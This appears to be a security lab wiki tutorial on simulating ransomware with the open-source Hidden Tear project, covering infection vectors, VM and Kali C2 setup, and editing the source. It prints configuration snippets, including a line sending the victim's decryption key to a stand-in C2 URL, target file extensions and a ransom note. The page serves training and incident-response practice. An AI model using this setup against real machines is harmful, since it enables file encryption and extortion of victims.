Ransomware Simulation (Hidden Tear)

From Embedded Lab Vienna for IoT & Security
Jump to navigation Jump to search

Introduction

Ransomware is a type of malicious software designed to encrypt files or block access to systems until a ransom is paid, often in cryptocurrency like Bitcoin. Ransomware has evolved significantly over time and can be categorized into two main types:

  • Locker Ransomware: Locks access to the entire system or device.
  • Crypto Ransomware: Encrypts specific files, rendering them inaccessible without a decryption key.

The global damage caused by ransomware attacks has reached staggering figures, with costs estimated to exceed billions of dollars annually. These damages include ransom payments, downtime, data loss, and recovery expenses, highlighting the severe impact ransomware can have on businesses and individuals. The evolution of ransomware dates back to the first known example, the AIDS Trojan in 1989, which was distributed via floppy disks. Over the years, ransomware has become more sophisticated, with notable examples like CryptoLocker (2013), WannaCry (2017), and modern variants such as Ryuk and Conti targeting critical infrastructure and large organizations.


Typical Ways of Infection

  • Phishing Emails: Malicious attachments or links trick users into executing ransomware.
  • Drive-by Downloads: Visiting compromised websites results in automatic malware downloads.
  • Insecure Remote Desktop Protocols (RDP): Exploiting weak passwords or open ports.
  • Infected USB Devices: Malware spreads through external storage devices.

Once a system is infected, ransomware typically leaves behind various artefacts, such as:

  • Encrypted Files: Files are renamed with unusual extensions (e.g., .crypt or .lock).
  • Ransom Notes: Instructions for paying the ransom, often in text files (e.g., README.txt or DECRYPT_INSTRUCTIONS.txt).
  • System Modifications: Changes to registry keys, scheduled tasks, or startup entries to maintain persistence.
  • Network Activity: Evidence of communication with Command-and-Control (C2) servers, often through encrypted or TOR-based channels.


Purpose of a Simulation

Conducting a ransomware simulation using a tool like Hidden Tear serves several critical purposes:

  • Testing Security Infrastructure: Identifying vulnerabilities in existing systems and defenses.
  • Training Personnel: Providing hands-on experience for IT and non-IT staff to recognize and respond to ransomware incidents.
  • Improving Incident Response: Allowing teams to practice containment, eradication, and recovery processes in a controlled environment.


What is Hidden Tear?

Hidden Tear is an open-source ransomware project developed for educational purposes. It demonstrates the principles of file encryption and ransom demands in a controlled, non-malicious manner. Hidden Tear encrypts files on a target system using basic cryptographic techniques and displays a ransom note, making it a suitable tool for safe simulations.

Step-by-Step Guide: Ransomware Simulation with Hidden Tear

Setting up the Environment

First you create the victims machine, on which the HiddenTear Ransomware will be installed and configured:

  1. Install Virtualization Software like VirtualBox on your main machine.
  2. Set up a new virtual machine and install Windows (e.g., Windows 10)[1], be sure to assign enough resources to the VM (e.g., 2 CPUs, 4GB RAM, and 40GB disk space).
  3. After the installation, you need to configure two network adapter, one NAT-type to have internet access and second the host-only-adapter to create the isolated private network.
NAT adapter
Host-Only-Adapter


Now you create the Kali Linux Virtual Machine which will act as the attackers machine:

  1. Create a Kali Linux Virtual Machine, this will be the C2 server which the Ransomware sends the decryption key to.[2]
  2. Configure it with similar resource allocations and the same network settings as the windows machine.


Next, you need to install the required tools on the VMs:

On the windows VM:

  1. Install Visual Studio Community Edition for editing and compiling the HiddenTear source code.[3]
  2. Download HiddenTear from its Github repository.

On the Kali VM:

  1. Update and upgrade the system.
  2. Install apache2 to setup a webserver which will act as the C2-server.
Apache2 Webserver


Now ensure both VMs can communicate by configuring the host-only network. Assign static IP addresses to the VMs within the same subnet (e.g., 192.168.56.101 for Windows, 192.168.56.102 for Kali). Last but no least, you need two files on your apache2 webserver:

  • keys.php
  • data.txt

The keys.php file is the function that retrieves all the information from the victims machine and writes it into the data.txt file (e.g. device-name, username and decryption-password):

keys.php



Configuring Hidden Tear

Edit the source code on Windows in Visual Studi:

  1. Open the Form1.cs file in Visual Studio
  2. Look for the following lines of code and change it according to your configurations and liking:

Modify the code to send the encryption key to a server hosted on your Kali VM: 

string targetURL = "https://www.example.com/hidden-tear/write.php?info=";

Change the file extensions to your liking: 

System.IO.File.Move(file, file+".locked");

Update the targetFileExtensions variable to include specific file types you wish to encrypt, such as: 

var validExtensions = new[] {
".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"
};

Declare the path to the directory which should be encrypted: 

string path = "\\Desktop\\test";

Modify the ransom note: 

string path = "\\Desktop\\test\\READ_IT.txt";
string[] lines = { "Files has been encrypted with hidden tear", "Send me some bitcoins" };

Now change all these configurations in the decrypter file (e.g. file extension) and build both projects in Visual Studio to generate the ransomware executable: hidden-tear.exe and hidden-tear-decrypter.exe, they are located in the .\bin\Debug directory.

Executing the Simulation

  1. Create a test directory on your desktop and put a .txt file with some random text into it.
  2. Run the hidden-tear.exe file
  3. Observe the encryption process, including the file renaming and creating of a ransom note.
  4. Confirm that the targeted files are encrypted and inaccessible.

Now look into your data.txt file and check the information written into it. The last part is the randomly generated decryption password.

data.txt


At last, execute the hidden-tear-decryptor.exe file and use the password created in the data.txt file to decrypt all the files in your test directory.


References

  1. Install Windows 10 on VirtualBox
  2. Install Kali Linux on VirtualBox
  3. Visual Studio Official Site
Retrieved from "https://wiki.elvis.science/index.php?title=Ransomware_Simulation_(Hidden_Tear)&oldid=17886"